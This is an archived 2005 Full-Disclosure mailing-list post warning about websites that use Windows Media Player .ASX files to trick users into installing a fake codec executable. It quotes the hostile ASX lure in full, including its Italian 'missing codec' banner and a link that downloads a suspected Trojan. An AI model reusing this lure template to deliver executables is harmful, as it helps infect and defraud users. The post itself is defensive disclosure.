[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Social Eng. with Windows Media Player and Codec Download

To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Social Eng. with Windows Media Player and Codec Download
From: "Elia Florio" <eflorio@xxxxxxxxxxx>
Date: Wed, 28 Dec 2005 20:00:39 +0100

Here:
hXXp://www.goodmovielaugh.com/video5.html
hXXp://www.good-movie-jokes.com/video5.html

there's some malware/adware that try to use .ASX files as vector to infect windows machines by forcing users to download and install executables. The trick (not an exploit!!!!) is to convince people that Windows Media Player needs an additional codec....so that users confirm the download of an EXE file.

In the page there's a reference for an .ASX file:

<ASX version="3.0"> <ENTRY> <TITLE>Impossibile Trovare il Codec</TITLE> <REF HREF="video.avi"/> <DURATION VALUE="60:00"/> <BANNER HREF="codec-alert.gif"> <ABSTRACT>Clicca qui per scaricare i codec aggiornati</ABSTRACT> <MOREINFO HREF="http://www.vcodecreceive.com/download/VideoCodec3_05b_5.exe"; /> </BANNER> </ENTRY> </ASX>

The EXE file downloaded is probably some Download.Trojan or Trojan.Clicker packed with Nullsoft NSIS.

EF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] complaints about the governemnt spying!
Next by Date: Re: [Full-disclosure] test this
Previous by thread: [Full-disclosure] Obsidis #1 released
Next by thread: [Full-disclosure] Re: [MailServer Notification]To recipient: Message matched eManager setting and action was taken.
Index(es):
- Date
- Thread